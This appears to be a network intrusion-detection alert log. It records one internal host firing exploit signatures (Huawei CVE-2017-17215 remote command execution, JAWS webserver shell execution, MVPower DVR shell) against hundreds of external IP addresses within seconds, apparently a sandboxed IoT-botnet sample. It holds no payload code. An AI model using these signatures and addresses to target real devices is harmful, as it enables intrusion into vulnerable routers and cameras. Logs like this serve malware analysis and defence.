                            06/10/24-15:38:00.235344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5186837215192.168.2.13197.27.124.211
                            06/10/24-15:38:00.166755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3463237215192.168.2.1341.79.189.48
                            06/10/24-15:38:00.272286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3853837215192.168.2.1341.71.37.130
                            06/10/24-15:38:02.703161TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4552637215192.168.2.13156.79.220.96
                            06/10/24-15:38:00.190865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3286237215192.168.2.1341.237.134.242
                            06/10/24-15:38:00.250990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5080037215192.168.2.13197.56.46.223
                            06/10/24-15:38:02.773931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6046637215192.168.2.13156.151.233.250
                            06/10/24-15:38:02.867036TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5267837215192.168.2.13197.121.202.25
                            06/10/24-15:38:02.766582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5293637215192.168.2.13197.122.248.88
                            06/10/24-15:37:59.928827TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4568237215192.168.2.1341.117.101.224
                            06/10/24-15:38:02.729371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6003837215192.168.2.1341.46.72.248
                            06/10/24-15:38:02.707896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5219037215192.168.2.13156.122.95.109
                            06/10/24-15:38:02.854671TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6076037215192.168.2.1341.101.217.26
                            06/10/24-15:38:02.185065TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3491480192.168.2.13208.149.111.33
                            06/10/24-15:38:02.705525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4964437215192.168.2.1341.150.3.195
                            06/10/24-15:38:02.093773TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4892880192.168.2.13205.225.173.196
                            06/10/24-15:38:02.698008TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4258637215192.168.2.1341.64.38.156
                            06/10/24-15:38:00.132023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4329237215192.168.2.1341.102.185.160
                            06/10/24-15:38:02.758344TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3398237215192.168.2.13197.200.122.252
                            06/10/24-15:38:02.121056TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3421280192.168.2.1396.74.255.252
                            06/10/24-15:38:00.249566TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4987437215192.168.2.13156.167.167.199
                            06/10/24-15:38:02.145053TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3591080192.168.2.13106.7.166.126
                            06/10/24-15:38:02.762083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5939237215192.168.2.13156.167.31.0
                            06/10/24-15:38:02.911966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3388037215192.168.2.1341.213.29.197
                            06/10/24-15:38:00.034176TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3634837215192.168.2.1341.222.149.196
                            06/10/24-15:38:00.248812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3307037215192.168.2.13197.190.17.120
                            06/10/24-15:38:02.716092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4297037215192.168.2.13156.28.97.254
                            06/10/24-15:38:02.506272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3278237215192.168.2.13156.211.133.216
                            06/10/24-15:38:02.721224TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3828437215192.168.2.13156.46.144.10
                            06/10/24-15:38:02.084991TCP2025883ET EXPLOIT MVPower DVR Shell UCE5891280192.168.2.1367.115.43.219
                            06/10/24-15:38:00.013509TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5297637215192.168.2.13197.57.169.86
                            06/10/24-15:38:02.298942TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4990080192.168.2.13204.44.180.10
                            06/10/24-15:38:00.270805TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5775837215192.168.2.1341.129.88.86
                            06/10/24-15:37:59.943220TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3409237215192.168.2.1341.30.124.178
                            06/10/24-15:38:02.833196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5646037215192.168.2.13156.146.144.209
                            06/10/24-15:38:00.008957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660837215192.168.2.1341.223.243.35
                            06/10/24-15:38:02.653727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3880037215192.168.2.1341.58.235.129
                            06/10/24-15:38:02.819947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4609037215192.168.2.13156.21.102.72
                            06/10/24-15:38:02.877070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5463037215192.168.2.13197.158.23.49
                            06/10/24-15:37:59.954562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3399037215192.168.2.1341.196.189.226
                            06/10/24-15:37:59.753726TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5864880192.168.2.1350.13.193.163
                            06/10/24-15:38:02.123851TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4619680192.168.2.13209.207.220.115
                            06/10/24-15:38:00.255183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5517037215192.168.2.13156.134.168.58
                            06/10/24-15:37:59.981701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4112037215192.168.2.1341.186.239.153
                            06/10/24-15:38:00.209800TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4602837215192.168.2.13156.46.209.218
                            06/10/24-15:37:59.944688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4664437215192.168.2.13156.79.10.64
                            06/10/24-15:37:59.863643TCP2025883ET EXPLOIT MVPower DVR Shell UCE4323280192.168.2.1380.234.35.77
                            06/10/24-15:38:02.149120TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5863480192.168.2.132.133.83.163
                            06/10/24-15:38:02.846884TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5376837215192.168.2.13156.122.197.14
                            06/10/24-15:38:02.119333TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3594680192.168.2.13153.10.225.113
                            06/10/24-15:37:59.776818TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5989880192.168.2.13213.227.25.210
                            06/10/24-15:38:00.010670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5496437215192.168.2.1341.58.54.58
                            06/10/24-15:38:02.810751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5374037215192.168.2.13156.100.123.7
                            06/10/24-15:37:59.991203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5286037215192.168.2.13156.29.235.89
                            06/10/24-15:38:02.789775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5124037215192.168.2.1341.86.51.96
                            06/10/24-15:37:59.815835TCP2025883ET EXPLOIT MVPower DVR Shell UCE5377680192.168.2.1378.199.201.121
                            06/10/24-15:38:02.095481TCP2025883ET EXPLOIT MVPower DVR Shell UCE5720680192.168.2.13205.141.193.122
                            06/10/24-15:38:02.791154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3479237215192.168.2.1341.189.9.139
                            06/10/24-15:38:02.250043TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4425480192.168.2.1366.136.9.144
                            06/10/24-15:38:00.224097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4709437215192.168.2.13156.137.31.90
                            06/10/24-15:38:02.864253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4711237215192.168.2.13156.213.216.105
                            06/10/24-15:37:59.979091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515637215192.168.2.13197.37.79.4
                            06/10/24-15:38:02.688716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4232037215192.168.2.13197.58.68.31
                            06/10/24-15:38:02.671087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4527437215192.168.2.13156.196.121.47
                            06/10/24-15:38:00.161493TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3354037215192.168.2.1341.69.228.208
                            06/10/24-15:38:02.104496TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4440280192.168.2.1379.2.193.50
                            06/10/24-15:38:00.189175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5846437215192.168.2.1341.57.17.164
                            06/10/24-15:38:02.648657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4428437215192.168.2.1341.231.143.228
                            06/10/24-15:38:00.221508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5414037215192.168.2.13197.225.243.209
                            06/10/24-15:38:02.765712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4273237215192.168.2.1341.182.157.126
                            06/10/24-15:37:59.790906TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4100280192.168.2.13173.150.225.180
                            06/10/24-15:38:00.008064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3932437215192.168.2.13156.211.48.76
                            06/10/24-15:38:00.026295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4302037215192.168.2.13156.253.209.134
                            06/10/24-15:38:02.087126TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3843280192.168.2.13112.146.51.255
                            06/10/24-15:38:00.176046TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4153237215192.168.2.13197.127.189.142
                            06/10/24-15:38:02.721224TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3828437215192.168.2.13156.46.144.10
                            06/10/24-15:38:02.197579TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4596680192.168.2.1397.242.25.160
                            06/10/24-15:38:02.154888TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5187080192.168.2.1365.168.33.57
                            06/10/24-15:37:59.992068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4912837215192.168.2.13156.165.201.247
                            06/10/24-15:38:00.029158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3493837215192.168.2.13156.205.120.113
                            06/10/24-15:37:59.800000TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4201680192.168.2.13195.50.200.227
                            06/10/24-15:37:59.976497TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3493237215192.168.2.13197.9.107.34
                            06/10/24-15:38:02.307423TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4250680192.168.2.1394.124.142.214
                            06/10/24-15:38:00.211497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4592237215192.168.2.13156.25.179.14
                            06/10/24-15:38:00.210637TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5021037215192.168.2.13156.62.210.214
                            06/10/24-15:38:02.188001TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3581280192.168.2.1393.194.35.168
                            06/10/24-15:38:02.830775TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717437215192.168.2.1341.72.64.165
                            06/10/24-15:38:02.092323TCP2025883ET EXPLOIT MVPower DVR Shell UCE3808280192.168.2.1394.87.180.153
                            06/10/24-15:38:00.258740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5388437215192.168.2.13156.254.58.48
                            06/10/24-15:38:02.739622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5865037215192.168.2.13156.58.2.142
                            06/10/24-15:38:02.779348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956037215192.168.2.13197.254.151.216
                            06/10/24-15:38:02.126147TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4109680192.168.2.13218.60.33.200
                            06/10/24-15:37:59.836086TCP2025883ET EXPLOIT MVPower DVR Shell UCE4000480192.168.2.13184.225.110.223
                            06/10/24-15:38:00.192522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4817237215192.168.2.13156.168.245.29
                            06/10/24-15:38:02.683936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985437215192.168.2.13156.19.238.181
                            06/10/24-15:38:00.022727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3816437215192.168.2.13156.162.243.21
                            06/10/24-15:38:02.907506TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5160237215192.168.2.13156.230.96.138
                            06/10/24-15:38:02.664556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246837215192.168.2.13197.210.141.62
                            06/10/24-15:37:59.973058TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5635037215192.168.2.13156.211.89.221
                            06/10/24-15:38:00.193999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4357837215192.168.2.13197.105.96.234
                            06/10/24-15:38:02.227858TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4968480192.168.2.13194.172.51.155
                            06/10/24-15:38:02.214505TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3539280192.168.2.1376.65.135.249
                            06/10/24-15:38:02.650837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4204437215192.168.2.13197.254.128.168
                            06/10/24-15:38:02.112951TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5248280192.168.2.13172.81.228.248
                            06/10/24-15:38:02.925765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5582037215192.168.2.13156.189.36.162
                            06/10/24-15:37:59.964618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5437037215192.168.2.13156.201.14.29
                            06/10/24-15:37:59.845254TCP2025883ET EXPLOIT MVPower DVR Shell UCE6092680192.168.2.1320.163.218.116
                            06/10/24-15:38:02.203124TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5287280192.168.2.1351.110.96.206
                            06/10/24-15:37:59.958705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4416437215192.168.2.1341.26.2.2
                            06/10/24-15:38:02.637710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5030637215192.168.2.13156.0.208.206
                            06/10/24-15:38:02.147810TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5877080192.168.2.13118.254.40.208
                            06/10/24-15:38:02.649435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4450437215192.168.2.1341.61.237.24
                            06/10/24-15:37:59.747937TCP2025883ET EXPLOIT MVPower DVR Shell UCE3282480192.168.2.1370.109.71.255
                            06/10/24-15:38:00.253813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4307837215192.168.2.13156.243.212.25
                            06/10/24-15:37:59.945412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5376837215192.168.2.13156.31.27.232
                            06/10/24-15:38:02.811819TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4944237215192.168.2.13156.234.212.72
                            06/10/24-15:38:00.218073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4526237215192.168.2.13156.193.239.253
                            06/10/24-15:38:00.274014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5970637215192.168.2.13156.154.82.234
                            06/10/24-15:38:00.181485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4894837215192.168.2.1341.116.99.196
                            06/10/24-15:38:02.132768TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4550480192.168.2.1392.13.170.51
                            06/10/24-15:38:02.752803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5726437215192.168.2.13197.69.40.39
                            06/10/24-15:38:02.101873TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4480280192.168.2.13105.130.18.45
                            06/10/24-15:38:00.003802TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3375637215192.168.2.13197.244.78.206
                            06/10/24-15:38:00.021324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5156237215192.168.2.1341.130.180.46
                            06/10/24-15:37:59.864921TCP2025883ET EXPLOIT MVPower DVR Shell UCE3710880192.168.2.1386.248.77.229
                            06/10/24-15:38:02.106417TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5240880192.168.2.13138.243.195.109
                            06/10/24-15:38:00.002137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5440237215192.168.2.1341.63.241.27
                            06/10/24-15:38:02.233253TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3717080192.168.2.13163.245.107.156
                            06/10/24-15:37:59.788491TCP2025883ET EXPLOIT MVPower DVR Shell UCE4604280192.168.2.1331.24.128.114
                            06/10/24-15:38:02.501600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5854837215192.168.2.1341.114.65.8
                            06/10/24-15:38:02.505632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4227637215192.168.2.1341.70.83.42
                            06/10/24-15:38:02.710308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5012837215192.168.2.1341.228.119.118
                            06/10/24-15:37:59.948276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4644237215192.168.2.13156.98.83.218
                            06/10/24-15:38:02.123264TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4036080192.168.2.1375.224.59.165
                            06/10/24-15:38:02.792332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5125437215192.168.2.1341.54.19.9
                            06/10/24-15:38:02.843717TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5019437215192.168.2.13156.3.211.244
                            06/10/24-15:38:00.177056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3980037215192.168.2.13156.160.21.128
                            06/10/24-15:38:02.865201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3873037215192.168.2.13156.8.50.69
                            06/10/24-15:38:02.157293TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5584680192.168.2.1313.225.119.16
                            06/10/24-15:38:02.502931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4624037215192.168.2.1341.185.155.40
                            06/10/24-15:38:00.184599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5999837215192.168.2.1341.122.109.42
                            06/10/24-15:38:02.788817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5628437215192.168.2.13156.174.49.82
                            06/10/24-15:38:00.037044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3378637215192.168.2.13156.179.78.181
                            06/10/24-15:37:59.806758TCP2025883ET EXPLOIT MVPower DVR Shell UCE4055680192.168.2.1384.162.2.5
                            06/10/24-15:38:00.273128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4202637215192.168.2.13197.128.86.63
                            06/10/24-15:38:02.195196TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3862080192.168.2.1324.223.164.59
                            06/10/24-15:37:59.781384TCP2025883ET EXPLOIT MVPower DVR Shell UCE3750680192.168.2.13115.165.178.143
                            06/10/24-15:38:02.492497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4623637215192.168.2.13197.115.124.164
                            06/10/24-15:37:59.990322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3719637215192.168.2.1341.89.132.28
                            06/10/24-15:38:02.786162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5221637215192.168.2.13156.193.153.44
                            06/10/24-15:38:02.875172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4563637215192.168.2.13197.94.37.133
                            06/10/24-15:38:00.234498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4308437215192.168.2.13156.178.253.203
                            06/10/24-15:38:02.122172TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6088880192.168.2.1331.54.174.172
                            06/10/24-15:38:02.297540TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4866080192.168.2.13109.42.218.157
                            06/10/24-15:38:00.257346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3295037215192.168.2.13156.146.151.12
                            06/10/24-15:38:02.653315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5729637215192.168.2.1341.208.114.199
                            06/10/24-15:38:02.878023TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5926437215192.168.2.13197.15.80.136
                            06/10/24-15:38:02.695812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4265037215192.168.2.13197.231.249.66
                            06/10/24-15:38:02.325384TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6041680192.168.2.13211.65.87.166
                            06/10/24-15:38:02.934901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3410237215192.168.2.13156.104.219.208
                            06/10/24-15:38:02.159318TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4181680192.168.2.13150.177.195.126
                            06/10/24-15:38:02.681567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3532837215192.168.2.1341.9.208.117
                            06/10/24-15:38:02.713903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5070237215192.168.2.13156.244.102.173
                            06/10/24-15:37:59.941006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3351437215192.168.2.13156.78.13.161
                            06/10/24-15:38:02.715141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4671237215192.168.2.13197.57.43.253
                            06/10/24-15:38:00.246351TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4115037215192.168.2.1341.234.210.66
                            06/10/24-15:38:00.261547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5160437215192.168.2.13197.95.0.54
                            06/10/24-15:38:02.813306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5045437215192.168.2.13156.192.98.232
                            06/10/24-15:38:02.304825TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3767880192.168.2.13148.136.36.100
                            06/10/24-15:38:02.641973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5777437215192.168.2.13197.167.195.153
                            06/10/24-15:38:00.196297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4894237215192.168.2.13197.159.13.233
                            06/10/24-15:38:02.702109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4472237215192.168.2.13156.243.126.82
                            06/10/24-15:38:02.767730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5989037215192.168.2.13197.148.119.5
                            06/10/24-15:37:59.795427TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3748880192.168.2.1386.102.128.211
                            06/10/24-15:38:00.243948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3851637215192.168.2.13197.161.103.248
                            06/10/24-15:38:02.498091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4948837215192.168.2.13156.64.75.27
                            06/10/24-15:37:59.849795TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4962080192.168.2.13161.106.196.70
                            06/10/24-15:38:02.932450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3340637215192.168.2.13156.179.20.17
                            06/10/24-15:37:59.955351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3629437215192.168.2.1341.12.156.197
                            06/10/24-15:38:00.175015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5656837215192.168.2.13197.123.247.90
                            06/10/24-15:38:00.179072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5014837215192.168.2.13156.179.233.113
                            06/10/24-15:38:02.243843TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution5670680192.168.2.1319.71.2.182
                            06/10/24-15:38:02.669182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3613237215192.168.2.13197.46.18.42
                            06/10/24-15:38:02.732625TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599837215192.168.2.13197.6.6.199
                            06/10/24-15:37:59.949732TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5910037215192.168.2.13156.216.173.116
                            06/10/24-15:38:02.645712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4326237215192.168.2.1341.98.155.71
                            06/10/24-15:38:02.787074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5639237215192.168.2.13156.2.80.141
                            06/10/24-15:38:00.190024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4650437215192.168.2.13197.0.201.185
                            06/10/24-15:38:02.217969TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4120480192.168.2.1320.87.200.184
                            06/10/24-15:37:59.809084TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3532880192.168.2.1351.33.7.198
                            06/10/24-15:37:59.856619TCP2025883ET EXPLOIT MVPower DVR Shell UCE4356080192.168.2.1324.223.44.225
                            06/10/24-15:38:02.175938TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution3433080192.168.2.1369.194.229.28
                            06/10/24-15:38:02.508359TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5833037215192.168.2.13197.240.30.85
                            06/10/24-15:37:59.868776TCP2025883ET EXPLOIT MVPower DVR Shell UCE4204680192.168.2.13195.209.166.102
                            06/10/24-15:38:00.007220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5353837215192.168.2.1341.236.7.25
                            06/10/24-15:38:02.724796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5276037215192.168.2.13197.28.22.183
                            06/10/24-15:37:59.772200TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution4915680192.168.2.13181.171.108.67
                            06/10/24-15:38:00.197151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4867437215192.168.2.1341.154.147.59
                            06/10/24-15:38:02.233909TCP2030092ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution6090080192.168.2.13164.62.170.48
